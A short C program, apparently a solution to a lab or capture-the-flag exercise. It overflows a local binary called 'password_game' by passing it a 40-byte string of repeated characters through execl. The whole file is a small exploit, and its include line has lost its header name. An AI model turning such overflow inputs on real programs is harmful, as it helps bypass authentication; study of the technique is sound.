#include int main(){ char exploit_string[1024]; for(int i = 0; i < 40; i++) exploit_string[i] = 50; exploit_string[40] = 0; execl("password_game", "password_game", exploit_string, 0); }